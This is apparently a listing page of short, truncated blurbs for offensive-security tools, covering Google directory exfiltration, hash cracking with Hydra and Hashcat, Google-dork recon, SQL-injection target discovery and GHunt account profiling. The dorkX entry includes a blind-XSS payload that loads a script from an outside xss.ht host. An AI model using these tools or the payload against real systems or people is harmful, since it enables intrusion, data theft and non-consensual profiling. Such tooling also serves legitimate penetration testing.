Red Team tool for exfiltrating the target organization’s Google People Directory that you have access to, via Google’s People API. HOW TO Create a new Google Cloud Platform (GCP) project Steps to get the Google API Access Token needed for connecting to the API Create a burner gmail/google account Login to said account Navigate toRead More
Abuse of Google Colab for fun and profit. What is it ? Penglab is a ready-to-install setup on Google Colab for cracking hashes with an incredible power, really useful for CTFs. (See benchmarks below.) It installs by default : Hashcat John Hydra SSH (with ngrok) And now, it can also : Launch an integrated shellRead More
subdomains by looking at Google Analytics IDs > Python/GO versions > By @JosueEncinar “> > Get related domains / subdomains by looking at Google Analytics IDs> Python/GO versions> By @JosueEncinar This script try to get related domains / subdomains by looking at Google Analytics IDs from a URL. First search for ID of Google AnalyticsRead More
Search For Documents In A Domain Through Google. The Objective Is To Extract Metadata. Installing dependencies: > git clone https://github.com/Josue87/MetaFinder.git> cd MetaFinder> pip3 install -r requirements.txt Usage python3 metafinder.py -t domain.com -l 20 [-v] Parameters: t: Specifies the target domain. l: Specify the maximum number of results to be searched. v: Optional. It is usedRead More
GRecon (Greei-Conn) is a simple python tool that automates the process of Google Based Recon AKA Google Dorking The current Version 1.0 Run 7 Search Queries (7 Micro-Plugins) on the spicified Target Providing Awsome Results Current Version Run Google Search Queries to find : Subdomains Sub-Subdomains Signup/Login pages Dir Listing Exposed Docs pdf…xls…docx… WordPress EntriesRead More
Grawler is a tool written in PHP which comes with a web interface that automates the task of using google dorks, scrapes the results, and stores them in a file. General info Grawler aims to automate the task of using google dorks with a web interface, the main idea is to provide a simple yetRead More
Fawkes is a tool to search for targets vulnerable to SQL Injection. Performs the search using Google search engine. Options -q, –query – Dork that will be used in the search engine. -r, –results – Number of results brought by the search engine. -s, –start-page – Home page of search results. -t, –timeout – TimeoutRead More
GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications. The purpose of this tool is to facilitate the extraction of any service method endpoints buried within a modern GWT application’s obfuscated client-side code, and attempt to generate example GWT-RPC requests payloads to interact with them. More informationRead More
GHunt is an OSINT tool to extract a lot of informations of someone’s Google Account email. It can currently extract : Owner’s name Last time the profile was edited Google ID If the account is an Hangouts Bot Activated Google services (Youtube, Photos, Maps, News360, Hangouts, etc.) Possible Youtube channel Possible other usernames Public photosRead More
Pipe different tools with google dork Scanner Install [email protected] ~/dorkX> git clone https://github.com/ethicalhackingplayground/dorkX [email protected] ~/dorkX> cd dorkX [email protected] ~/dorkX> go build dorkx.go [email protected] ~/dorkX> go build corsx.go [email protected] ~/dorkX> go build csrfx.go [email protected] ~/dorkX> go build zin.go Usage: Blind XSS [email protected] ~/dorkX> ./dorkX -dorks dorks.txt -concurrency 100 | dalfox pipe -b ‘”><script src=https://z0id.xss.ht></script>’ XSSRead More
